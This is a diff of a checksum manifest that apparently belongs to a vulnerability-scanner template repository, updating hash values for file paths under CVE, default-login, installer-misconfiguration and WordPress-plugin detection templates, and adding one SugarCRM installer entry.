+http/cves/2023/CVE-2023-37462.yaml:b45345e69acd4cd2edae00b75a5ff3eca0363dd6 +http/cves/2023/CVE-2023-37474.yaml:810cee8a1468dbcd53e6adec99795e561938ecd7 +http/cves/2023/CVE-2023-37580.yaml:db512d777918df7d536f660faf488826a5ccdc8d +http/cves/2023/CVE-2023-37629.yaml:fb4fe55126737a11d2c7cb0e644bfe211733d56d +http/cves/2023/CVE-2023-3765.yaml:ee54d30e91d6ed6e784757aa1214a88849d21fa4 +http/cves/2023/CVE-2023-37679.yaml:58c2fa7403e9eb33155bec5a8e4154c9bc2d6dbf +http/cves/2023/CVE-2023-37728.yaml:cd285746ff326b2050068cfdd7be6965e63f67f0 +http/cves/2023/CVE-2023-37979.yaml:83b5cc97554797a16d7dde249004c7bda1461015 http/cves/2023/CVE-2023-38035.yaml:15d889f727aeaff0c546f65f346dde3c5e5b23a5 -http/cves/2023/CVE-2023-38205.yaml:a5d2c8e57dd3dcff6f8efa72e5549147192377d5 -http/cves/2023/CVE-2023-3836.yaml:775ef1af2d473f39f8ab1e1b140f53d9c5535e72 -http/cves/2023/CVE-2023-3843.yaml:c9b4d4716c9370dcbb3aa1f9f28b653f86fe23ea -http/cves/2023/CVE-2023-38433.yaml:7150883e8790a174bc0851aa362dedddf54df0ab -http/cves/2023/CVE-2023-3844.yaml:65bdf8099bfdf450bf8bd1ced9b65f218afa76e1 -http/cves/2023/CVE-2023-3845.yaml:b64684c1d45c6bf1206594bfa7f376e889c3f448 -http/cves/2023/CVE-2023-3846.yaml:744fba631e09111fabbeeb1163d4745c68f10348 -http/cves/2023/CVE-2023-3847.yaml:d7b3e153b663995cfd4f2aa789af9201ef79992e -http/cves/2023/CVE-2023-3848.yaml:5e5b85112215c61037c720153ba372f6f2fa0a32 -http/cves/2023/CVE-2023-3849.yaml:71302733dd07406e7160f6538e046731fd768ea7 -http/cves/2023/CVE-2023-38501.yaml:db47f2f34b4a8f72467b24c848e26ae18795cb4f -http/cves/2023/CVE-2023-38646.yaml:08aba64007145de5d6529ef2a866ae6179a21b4c -http/cves/2023/CVE-2023-39026.yaml:9fb67d6b79ee6bc2957bd6a7042b5bd60e8a921e -http/cves/2023/CVE-2023-39108.yaml:1c7513e4c325f93814130eea40185745a1acfe85 -http/cves/2023/CVE-2023-39109.yaml:0603e88aecdadd983b16a5c86183604fc71ee26e -http/cves/2023/CVE-2023-39110.yaml:f785bdf351f2e55160610ff815aea90ab6d4f178 +http/cves/2023/CVE-2023-38205.yaml:dc84e258645604cfd9232b4832e3b62ff5cf7b9e +http/cves/2023/CVE-2023-3836.yaml:27346ee8f06f6cc43d24440ebd39ed1d23637742 +http/cves/2023/CVE-2023-3843.yaml:035208a40790651e1c79e2978e35f820ee76d4cb +http/cves/2023/CVE-2023-38433.yaml:d60d4b1f018619f5c9cd8b0d6dfc8d6cf3754dea +http/cves/2023/CVE-2023-3844.yaml:f309fa0972aa92d6da2c3541ed7e10dcd1f28204 +http/cves/2023/CVE-2023-3845.yaml:3ce4f37137b5bca26e35a0643273a86f8b5981e5 +http/cves/2023/CVE-2023-3846.yaml:ad9bedb96a335610a8268a497439685e56d5f18f +http/cves/2023/CVE-2023-3847.yaml:c42b52b1df42129be19ba33ae531958b5b9212b0 +http/cves/2023/CVE-2023-3848.yaml:d7b78d45af69482cee313ad51c210ddd91ff2978 +http/cves/2023/CVE-2023-3849.yaml:200ed4709d137cc2d1e4ce63618af004d9e5d25f +http/cves/2023/CVE-2023-38501.yaml:351123ac0590d74de3d1af55b4d2727fa3fdfdb3 +http/cves/2023/CVE-2023-38646.yaml:224b2d118f383b3ea36a05e5e634915c5bb30859 +http/cves/2023/CVE-2023-39026.yaml:a231c84021e2de582ac8f4ae3b5d3d5cce88fd5b +http/cves/2023/CVE-2023-39108.yaml:dcf85660907c3efb75c5c2d17f8baaeeebcafd85 +http/cves/2023/CVE-2023-39109.yaml:3342d551101a5d02e3766c5fa6d01cfb5e04dcc3 +http/cves/2023/CVE-2023-39110.yaml:98490148b0df7d5deb2c2617f850d97ee9760aa8 http/cves/2023/CVE-2023-39120.yaml:9462c57e65e4d5929c6b9f1a18a31a7c9a3eb2db -http/cves/2023/CVE-2023-39141.yaml:f13dec2369685211c07c83d07d7ad99eb95c4842 -http/cves/2023/CVE-2023-39143.yaml:514ccec4d4d5eae3627acb36e02201964d67ec4b -http/cves/2023/CVE-2023-3936.yaml:c0fbbe4af9b266eccf61282a069baffdcbbd6dc6 -http/cves/2023/CVE-2023-39361.yaml:2dc7b60bda93a8e64bfd45051408f0981393b8de -http/cves/2023/CVE-2023-39598.yaml:6c42d75e3ef80b533bad6e056b6ca6380b5d7ebc -http/cves/2023/CVE-2023-39600.yaml:b7029219b44952813b6b40253d74b37fc836b182 -http/cves/2023/CVE-2023-39676.yaml:8b9c522cbb94df31528b38dd89b72138a8643436 -http/cves/2023/CVE-2023-39677.yaml:14b3fe17617e1ca2eb28ed21cdaaf8f9c91eda87 -http/cves/2023/CVE-2023-39700.yaml:1621ae9bae370c6695732e60c87efade66e186f5 -http/cves/2023/CVE-2023-40208.yaml:25f3817d25051066c408729f5210c3ab17cbaa01 -http/cves/2023/CVE-2023-40779.yaml:66954fe9d124f8adda353b626aa2542918ea86c8 -http/cves/2023/CVE-2023-4110.yaml:87e025d63f8a2c682d4c9a52adbfec54123554ed -http/cves/2023/CVE-2023-4111.yaml:dac4611c417d486695d5a92ba2dc7c5c811e2b2f -http/cves/2023/CVE-2023-4112.yaml:5f5371122895bb989bc57184d6b977299f99c81f -http/cves/2023/CVE-2023-4113.yaml:465497eb31a895843b52430b0f5a2cef0252f413 -http/cves/2023/CVE-2023-4114.yaml:a6ee74bd553f084d278da691da7a108fcf8911d4 -http/cves/2023/CVE-2023-4115.yaml:ffdbbefde0ffdd2581f0d455a7e793091eae2ff2 -http/cves/2023/CVE-2023-4116.yaml:1cc265552109d361ffdc3a638824a95f88bde576 -http/cves/2023/CVE-2023-4148.yaml:e113a53fea35a87a35c52cc18daef27c7427f96a -http/cves/2023/CVE-2023-41538.yaml:04be49bd7a23c3d56452ab3737fcb06cbd2750dd -http/cves/2023/CVE-2023-41642.yaml:9cc6853b4359e731188af2b4049750de2fa430db -http/cves/2023/CVE-2023-4168.yaml:a7b3723a8759a39cd51ce10c47390f04a481729b -http/cves/2023/CVE-2023-4169.yaml:7f66c775fce02c261d7ee88672bc648cd22e0710 -http/cves/2023/CVE-2023-4173.yaml:926303123fb7f6d5e76ec03130e448d965c2a5b9 -http/cves/2023/CVE-2023-4174.yaml:3f61544d6cec77fb0a75849fedf863f5423b0130 -http/cves/2023/CVE-2023-41892.yaml:e2f586d99d064653ac8658bf13788c3d2f297489 -http/cves/2023/CVE-2023-42442.yaml:9d905658484d7341d76745ea778aeabd46d9f323 +http/cves/2023/CVE-2023-39141.yaml:1332cea485726e7c77b1a3e4288a46aa705f28fc +http/cves/2023/CVE-2023-39143.yaml:5759f732ad341257f9521c4698031676ab044ea2 +http/cves/2023/CVE-2023-3936.yaml:945b150512d180a67f683451554902435591aabe +http/cves/2023/CVE-2023-39361.yaml:be52be641d1a4ebd05e65c7f24e02b08a57f8227 +http/cves/2023/CVE-2023-39598.yaml:afbbe55321df66458500c76d0a116a134771898b +http/cves/2023/CVE-2023-39600.yaml:6c3070aa2e6a004c9c2a16fc364cf37be3c3dc54 +http/cves/2023/CVE-2023-39676.yaml:cebd5b3b7735ff69fbb8af741fa52081c8159c3a +http/cves/2023/CVE-2023-39677.yaml:b62ad08771ea03ca30ec0d980cb97cedca561d4d +http/cves/2023/CVE-2023-39700.yaml:7b84a3c608b05ca70582951000700b8859c73650 +http/cves/2023/CVE-2023-40208.yaml:321bd29d6733ce2e3e941ea02053c35d302b3290 +http/cves/2023/CVE-2023-40779.yaml:b550e59d3864c7a704063dd0e16c3fb4f862db10 +http/cves/2023/CVE-2023-4110.yaml:3bdf561f2480bdf87b4aee6ddd4168b5ac4fdc45 +http/cves/2023/CVE-2023-4111.yaml:f785f3254095371a481d04bb2b1994cd29c2b7ce +http/cves/2023/CVE-2023-4112.yaml:5bf0f95ffec416dd6e475f585ebc2f74a96c7696 +http/cves/2023/CVE-2023-4113.yaml:9dd0adea32b360886865520e0f2c56b497179cf5 +http/cves/2023/CVE-2023-4114.yaml:1f41cfbe883dbacef7bd660ac6aed53c51fe82a8 +http/cves/2023/CVE-2023-4115.yaml:f90cb6bab428332732dbfbe6efc6190c0bbbdccb +http/cves/2023/CVE-2023-4116.yaml:0b19e340abec999f4773c1aab6e3d756ddfba9f2 +http/cves/2023/CVE-2023-4148.yaml:5e4a12ec06d10d400ef6979e82bc2c88d13ddd4f +http/cves/2023/CVE-2023-41538.yaml:08a805a78f5b81300c0814e4111718e9654844e5 +http/cves/2023/CVE-2023-41642.yaml:dbaf49f4421c1279c5e61e040d2fc13ff9fd9d1b +http/cves/2023/CVE-2023-4168.yaml:4c7c3bcc0e34d15623f211a19aa10483b2294661 +http/cves/2023/CVE-2023-4169.yaml:7024b89a641982cb32c07a8fe2624b4e57f82af7 +http/cves/2023/CVE-2023-4173.yaml:02a83ac388cb9e795649fd644388dd8211cfb1e7 +http/cves/2023/CVE-2023-4174.yaml:1729505e19fff3d4d71bd9912032d744a70a320f +http/cves/2023/CVE-2023-41892.yaml:c1105bbd72f90b8d31c4522becc2f8f4d53710bf +http/cves/2023/CVE-2023-42442.yaml:e03e0f1c5f302479f539135a2db372e008562542 http/cves/2023/CVE-2023-42793.yaml:38aa019e461e0600a340cd71fb1f22fd937e99b4 -http/cves/2023/CVE-2023-43261.yaml:46d22dbd0f93f7d9d440f480c1994e865ec5af98 -http/cves/2023/CVE-2023-43795.yaml:0ce2a1845adef017c2c2759c8a06c70db925c66b -http/cves/2023/CVE-2023-4415.yaml:5966056464250a9a8cc76424bbb4d0f17f431700 -http/cves/2023/CVE-2023-4451.yaml:3968465e84a70d86a7bb7317ce2a883781cc1551 -http/cves/2023/CVE-2023-4547.yaml:d864f38b2ee402b3040420526963c1b444f66a4b -http/cves/2023/CVE-2023-4568.yaml:9f65e471563130561e42107439e2ee7be25a93da -http/cves/2023/CVE-2023-45852.yaml:d90fc8e68e7b0e0eee138d11497f876e4e212189 -http/cves/2023/CVE-2023-4634.yaml:9ea65b17e244181ce0520c967d3575b69e0e6e0f -http/cves/2023/CVE-2023-46747.yaml:a78c0c393982816e2cc2e4df12e599153914970c -http/cves/2023/CVE-2023-4714.yaml:f2a6375701687c13a85f2e69e0a3d00e3baf69e5 -http/cves/2023/CVE-2023-4966.yaml:814192e66791d534ab4bbebb4d7a71d180aca321 -http/cves/2023/CVE-2023-4974.yaml:bb230f1278828719df445c931218a64d89f3293e -http/cves/2023/CVE-2023-5074.yaml:b8a4afd349f130b869a397e158f3639dc77a43f6 -http/cves/2023/CVE-2023-5244.yaml:a83fb7284fffeb0abf671dd880b0686aa55fa543 -http/cves/2023/CVE-2023-5360.yaml:edbc83737ab8104efa37d4a2097a8369e951a23a +http/cves/2023/CVE-2023-43261.yaml:435f6b305d5bd92a9d2728afc002b2078550a4b4 +http/cves/2023/CVE-2023-43795.yaml:2d66952bcaf793aede0013cc2b549108e43996c3 +http/cves/2023/CVE-2023-4415.yaml:f5c0d669a8e9900d4a781b97f6f050899804c82d +http/cves/2023/CVE-2023-4451.yaml:b36e6a684503814c1635b8231668aa22a8c504e9 +http/cves/2023/CVE-2023-4547.yaml:6a046890e554f5086bcb5bb7969ef06ebdda4f5f +http/cves/2023/CVE-2023-4568.yaml:806c646ea1ebbe2a365a8053e3324272c531d94a +http/cves/2023/CVE-2023-45852.yaml:35e97b80a5cb32b98f0dbbba69baff00718bbbc8 +http/cves/2023/CVE-2023-4634.yaml:a9757d2930467b0e304b5cd8a4cf4186607faa03 +http/cves/2023/CVE-2023-46747.yaml:5edbdd20f689ca239c5171c4b81d81c4255d2b46 +http/cves/2023/CVE-2023-4714.yaml:9d5de29c00f3edd0134dcbbaa8f14e85cc2acf30 +http/cves/2023/CVE-2023-4966.yaml:841bd69c498df39b4397a77cb1ebd2bd3a3423db +http/cves/2023/CVE-2023-4974.yaml:5e8d20839065a049af031f8542d7a96596b10374 +http/cves/2023/CVE-2023-5074.yaml:6d476be89b3c64c16ffb80c834e1cfb1b3a388b1 +http/cves/2023/CVE-2023-5244.yaml:9225bc25e43b62e5b323550e0ba2bd04a0ffef36 +http/cves/2023/CVE-2023-5360.yaml:83978214bb056fab8455adc3a6bc072abedc1da0 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/UCMDB/ucmdb-default-login.yaml:627864b8eb2c47b7c717e1ed1800ba39eee5410c http/default-logins/abb/cs141-default-login.yaml:a5902dd34ba373c6f4e2cba15adbd9bf1e75e9c7 @@ -4761,8 +4761,8 @@ http/misconfiguration/installer/pmm-installer.yaml:56cc374e91c34ad10839bdc570b36 http/misconfiguration/installer/prestashop-installer.yaml:363ccf72dc0dd5b370849fb92c98c3c9d82fca79 http/misconfiguration/installer/processwire-installer.yaml:03be8885d42f953db067ab2c6ce5360a3717c108 http/misconfiguration/installer/redash-installer.yaml:3fbcee9ccaa0364463c22dde6dd13da555df10ac -http/misconfiguration/installer/ruckus-smartzone-install.yaml:ca572b5c0cc4b5b52055fb33682ef78e8ceb0aa4 -http/misconfiguration/installer/ruckus-unleashed-install.yaml:7c0fda0f8a9bb29116263ae79718d4dce3ddd1eb +http/misconfiguration/installer/ruckus-smartzone-install.yaml:0789d1cc83c476ab63dd619c2c14b50fe4961a69 +http/misconfiguration/installer/ruckus-unleashed-install.yaml:bd6be908be1e5dbbfc644a0abb49534c44a37725 http/misconfiguration/installer/server-monitor-installer.yaml:3a78c079e1d646be37669ff4611982be3c4ce8bb http/misconfiguration/installer/shopify-app-installer.yaml:850073860899ad956c3bb4cedf97bfb249b51270 http/misconfiguration/installer/shopware-installer.yaml:f02d507bb18d78973f4646f6f44402bb5d7cd1e1 @@ -4770,6 +4770,7 @@ http/misconfiguration/installer/smf-installer.yaml:0580091dc1dff181409813ccc26c0 http/misconfiguration/installer/sms-installer.yaml:2cd4f4afe481e7f671618c6aff43642288403655 http/misconfiguration/installer/spa-cart-installer.yaml:49531886b7f6388b490c27462a4d305bb3b2f093 http/misconfiguration/installer/spip-install.yaml:a930529e3a291d50a9e0e16a83f4bb690902cc09 +http/misconfiguration/installer/sugarcrm-install.yaml:4f7175e89282f85fcea9dcdaf52b19b69d407d0d http/misconfiguration/installer/suitecrm-installer.yaml:0404be2f9c0f07fba0dc745e327c47100a006408 http/misconfiguration/installer/sumowebtools-installer.yaml:a1359c2e91cd54b314576328b4ebf5a5b4107fe7 http/misconfiguration/installer/tasmota-install.yaml:38006a16195e87b147f99dea60c4c05b6ea7c226 @@ -6099,219 +6100,219 @@ http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:d9fdd79f207bada4455e74d1bba3391295bb9663 -http/technologies/wordpress/plugins/add-to-any.yaml:f9d3e245dd3372951f668eeaa60ed332417af271 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:fff97e4a13bd53e98ae9d26c7bf7ae365c17916f +http/technologies/wordpress/plugins/ad-inserter.yaml:8412732d698ba88550f2712b8c532524361a536f +http/technologies/wordpress/plugins/add-to-any.yaml:f6f1137f3145e709d48de0ffc2234cb59784cd2b +http/technologies/wordpress/plugins/admin-menu-editor.yaml:697dd0f8138940ee85785a6feca26c2faf1b4937 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9fe8c1f3217ebdde10e52c54a4f1d345ec68c22e -http/technologies/wordpress/plugins/akismet.yaml:14472ce976103cf7cbbc9fb549f49373daafbcc7 -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:68eb63356af56c5b732b4284813f285f2e5159b2 -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:4efd25c4e8b1be7c206e317954e3e19aef0df37b -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:fd324badec7196e2b39d4606ffeea5b78a1f3dba -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6f7f8387a4b87285cc967ad1d442339c54a57989 -http/technologies/wordpress/plugins/amp.yaml:6e9833062a1e2ca1fd164c557bad1092ab981aec -http/technologies/wordpress/plugins/antispam-bee.yaml:400e84c706f54dadfd79120922280f9fb471ded8 -http/technologies/wordpress/plugins/astra-sites.yaml:b8ee380f5ac7b348d2b46402fa6a6ad9f448381f -http/technologies/wordpress/plugins/astra-widgets.yaml:f5c43b2ed54f7afb030f193ed3aa07303c99b38a -http/technologies/wordpress/plugins/autoptimize.yaml:d2a9455241e0d877920e3f269b7fa44647a8cda5 -http/technologies/wordpress/plugins/backwpup.yaml:3721dab5bb97b1788f53139d903d537eb316961e -http/technologies/wordpress/plugins/better-search-replace.yaml:b01084bc606659b34d7ee2ddde2371d50e5ac26a -http/technologies/wordpress/plugins/better-wp-security.yaml:6659ac3f5e10efcc1e315ea318f93f6e2105d684 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:b27e48c9ab41222370e01052d80a9172e49d6792 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0520e77c46cdf7203e44a1af15d5864e64d69687 -http/technologies/wordpress/plugins/breeze.yaml:15df08e7d225634a7905615007220f8de4ebd4f1 -http/technologies/wordpress/plugins/broken-link-checker.yaml:161f39e6df1389e17ede38d75a4b380cd07d8c18 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:4e886b59f15671782c73547b5c708372c59bd289 -http/technologies/wordpress/plugins/classic-editor.yaml:c992b5934a0f97be00a6d868e13aba2e04b44dc8 -http/technologies/wordpress/plugins/classic-widgets.yaml:e64bd24ed8593b6d855ea7d4586a0c9de00a9e94 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:b8a9ed81190e5f93db1f216194266d5a9a1156da +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:dcb06ef4af8e1e9052b85368aa9daa245b682ee1 +http/technologies/wordpress/plugins/akismet.yaml:6858dc20e4ad38f071d5fd1e279141ed04a77a18 +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:c1fcb3e97d8e90eb4c4ea2f19f5b3a5908f41258 +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:1e29704bf9652fd0b638da646284bcbede750ef0 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:41d2d169b8b0c6d0ba5f7e849573f9d74eb6f868 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:4ee623a290d3e1652d24bd274794215d5d65b646 +http/technologies/wordpress/plugins/amp.yaml:b89984fd5c6e63021c88926afc26e04d8e39f2c6 +http/technologies/wordpress/plugins/antispam-bee.yaml:c9b70a4b3e2944782c6cf0811963d75df4b3414c +http/technologies/wordpress/plugins/astra-sites.yaml:bcb83e1ba829d6ece61ca3d9977e4f9bf9394139 +http/technologies/wordpress/plugins/astra-widgets.yaml:dc6eadb08dd021d7b6417a7c4c85b288bb1ee592 +http/technologies/wordpress/plugins/autoptimize.yaml:b1179f524f4eff6aff64c1bd51506d9fe941a0e9 +http/technologies/wordpress/plugins/backwpup.yaml:6d118288279b532911acd29e09278f632b10be86 +http/technologies/wordpress/plugins/better-search-replace.yaml:717492dc658c2b7639e8d25f3bfe75124fab352e +http/technologies/wordpress/plugins/better-wp-security.yaml:e8bf733546d9350cf0db9fea7a5e186e999462e5 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:780289ed80722237049adfdb3b0065401627f8b2 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:9489f265531c7cd68b5abde34af05dc17997c674 +http/technologies/wordpress/plugins/breeze.yaml:8b1042e810336e1f6228bea8aaba3908ee2f3cf1 +http/technologies/wordpress/plugins/broken-link-checker.yaml:641d803b9a9bccbfbb6d8c77f675bfcf5453b8e5 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:08be8d3dc777a692349a706c2f0f8f0688079b20 +http/technologies/wordpress/plugins/classic-editor.yaml:12f93b1da4b9c392a300aecdbcd459f72d853d93 +http/technologies/wordpress/plugins/classic-widgets.yaml:eeb29d3bb26627dc7778f8c4fd282bce57afee45 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:04f6146389f833db0e0d32eb9f461061997108b7 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:eb5ac0db9f2887ac51df676198e67ff312cac9b5 -http/technologies/wordpress/plugins/coblocks.yaml:c0bcb3427d20c790e416a49e835a1024a720614b -http/technologies/wordpress/plugins/code-snippets.yaml:57b1357527e40895bde483be54facc4a50e1248c -http/technologies/wordpress/plugins/coming-soon.yaml:4a30a84444d250a4e2bdc3cd3c26562c6861a888 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:638c727119fe9622f32ef253ddbe18f904a830ae -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:75142c07c546ec39ff8e691fecf585250dffd629 -http/technologies/wordpress/plugins/contact-form-7.yaml:9d16eec5ee3cae07b7f66fcb49c39fae85bdc88e -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:b13146d8d2392b1eaf210fd7a1a5d9b0d9ba33d1 -http/technologies/wordpress/plugins/cookie-law-info.yaml:221b83b25e9aead2f1767d94637d6fa2d255d4b8 -http/technologies/wordpress/plugins/cookie-notice.yaml:1a174ac82a080d6ae04ab46e7cb786ed0fb4a9e5 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:b8704432f4a5f52df1532dd75d138c6ed3bd89fd -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:fccf0258b4fab0e5b8bed27b9ddd4babc9a888ca -http/technologies/wordpress/plugins/custom-css-js.yaml:e6c5bc1b314c3a3c67b99310ebaecf34af6ad19b -http/technologies/wordpress/plugins/custom-fonts.yaml:c91cb9d81012905a1afeb7d8a600cb1424b34263 -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:f7b2141d01cefb840811062c2838f17422193770 -http/technologies/wordpress/plugins/disable-comments.yaml:0ee894fd578f2475cc33a8b6f25303561fc9b196 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:b07490a2cd2b4235eb56a3eb8dc76e8708b45107 -http/technologies/wordpress/plugins/duplicate-page.yaml:6888d30e6cb2bd3ed3cbf6441371a2991b73808b -http/technologies/wordpress/plugins/duplicate-post.yaml:4305832e3db0bc5fdce33358f8f802d532190fbb -http/technologies/wordpress/plugins/duplicator.yaml:cc001b89825c6936620dfa76918c829946568577 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d030c3e52175a52b54f138b37f984e42b5c1432c -http/technologies/wordpress/plugins/easy-fancybox.yaml:1fc9d5bd627e8a2cf55c1ab2ac750602e8761390 +http/technologies/wordpress/plugins/cmb2.yaml:05a0001bbbd0517a4ad2ad8c0dbaf73ed9224188 +http/technologies/wordpress/plugins/coblocks.yaml:290386c39afeaa02439fd0f3897644b4b584def0 +http/technologies/wordpress/plugins/code-snippets.yaml:e6b69994373acfdf7c1d853685d74926e86ff21f +http/technologies/wordpress/plugins/coming-soon.yaml:b69b416181d3c24151a43180c6e1694d49aad0e0 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:8cb149c2a61ac7447d97d2ff4692244c5da54962 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:efa4c0cd9e6150a6ada22a2fc64235d9675ad6d1 +http/technologies/wordpress/plugins/contact-form-7.yaml:32bd2b429767ba39975496e134ea399585d21a26 +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:7f6b45ae09f6bfddb3bb1f231448cd755c2980c4 +http/technologies/wordpress/plugins/cookie-law-info.yaml:637f38065ca7f8264b1f04b4c39cbfa392731365 +http/technologies/wordpress/plugins/cookie-notice.yaml:d9aa940b4cf92bbf5f9ef0d142de5045c7f785d2 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:6f1e8fc33a90e0229177acd2ca782ee5b7b8a4af +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:a54dddbdce917724405672d5fd023de34672cd60 +http/technologies/wordpress/plugins/custom-css-js.yaml:f26594019805ad66229651d7a335b95db14ab479 +http/technologies/wordpress/plugins/custom-fonts.yaml:0ca98e5e7afcc3f9def8e01374cca402ea591172 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:74ea92c51e97673c859779456ea3c987e87b3f1d +http/technologies/wordpress/plugins/disable-comments.yaml:360339ab47c4af4d405be8523b25e233dc401f82 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:c00de4d451cb6dab874c5324916023dd0796215c +http/technologies/wordpress/plugins/duplicate-page.yaml:6d9acce606c35f594fbe8d36871b1d8801b1d947 +http/technologies/wordpress/plugins/duplicate-post.yaml:4330552234c86fe105ad68f6f1b3793b1907bcd6 +http/technologies/wordpress/plugins/duplicator.yaml:91a1925e79ee14f59d6ca6d4048a3e912582c0df +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d18e7a85dacf730e8096f78427775f801e96ef74 +http/technologies/wordpress/plugins/easy-fancybox.yaml:88e9afff7a79a94b1bd8cecdf793bfe0c6b88369 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:39fe496817e0d81e9c0ee86f10004ea23978e20c -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:085aef92f98fcaf8ef55a55f49a2e5e359511e61 -http/technologies/wordpress/plugins/elementor.yaml:c2edf54f4a460a9ae22d566e905e514228843b78 -http/technologies/wordpress/plugins/elementskit-lite.yaml:169a5ba36ab75e8f9ab15a7eafbf23e9ea4ef4f4 -http/technologies/wordpress/plugins/enable-media-replace.yaml:46aaf7f5bb1e4cef28fcda375cc41b3c39c86524 -http/technologies/wordpress/plugins/envato-elements.yaml:8f26bb5f5daac3c0a22b3d226e8b702c3fa26db1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:dcc91284536ff9de1bc34a1fb84c90670caa62bc -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:80b01b35dc1f6ff73d840cf9c08e97ee6a7d8243 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:ab610645bee96c5c43039050a627c8f0030187a0 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:20c9261a62f0c32f5ac75409043a025b8a4ed6d1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:d55a4b37b35fd3b7c553b39ba211086ba5de6ac1 -http/technologies/wordpress/plugins/flamingo.yaml:31dd99add2277e18623b82319835f0e9f691283f -http/technologies/wordpress/plugins/fluentform.yaml:9b048a5fa49d7d64efbede89de2057581d98af55 -http/technologies/wordpress/plugins/font-awesome.yaml:e3ca531264bec7923784bcd912f6f3d85ef7446c -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:b8d40738109310109cc89989a9558705a423b752 -http/technologies/wordpress/plugins/formidable.yaml:7c70a876459f69253d69cb68bfb47e0b4e1d9843 -http/technologies/wordpress/plugins/forminator.yaml:96374ccbceff704741f31452ff6cba03e8536aca -http/technologies/wordpress/plugins/ga-google-analytics.yaml:ed88e4e823a6df77d01f009204f7274e93ce1ee2 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:81153624d751d75cb25106c88f85964eb8e7fe16 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:57bcb9e70e9c5f453df464a54521bb77205112eb -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:311c9ea02092851400d2466dbfd4bc0f083a4b7f -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:043d21037970c152de1a1f847c42eb9c22f7c0b6 -http/technologies/wordpress/plugins/google-site-kit.yaml:ca6367e1d9b7b6432c765e1d767d7a3c8c1dcbf4 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:e854b69e051aa978b81450922b4c7be67d7ac48b -http/technologies/wordpress/plugins/gtranslate.yaml:7f1007df8247545a5b82ab44b35993aa15adc8e7 -http/technologies/wordpress/plugins/gutenberg.yaml:c7e6ddc4751e154d1056463ab96542d62bf18453 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:9320890766e49a4b5fcc2f51161836685e1e0f8c +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:1c6448b15ba41b41f5ba7b9d5d1194f895e06d3c +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:356e942fd1b3081796f7ee3496ce7e45fe9dbe07 +http/technologies/wordpress/plugins/elementor.yaml:c47e6f95118fa47785d7980ffdc3ef8d771a40be +http/technologies/wordpress/plugins/elementskit-lite.yaml:c6f916daed6f755afcce231de70845483bfb7be7 +http/technologies/wordpress/plugins/enable-media-replace.yaml:ba6787109213066325b57f9a7e94866986e2ccab +http/technologies/wordpress/plugins/envato-elements.yaml:49920d4c3d983d6b087049b38b9280ca21d23694 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:c7241fb9381de6256392a8d47c9780c30478e0f8 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:13c7d63576f81cb21b2b8810d3c94bc7210ff09d 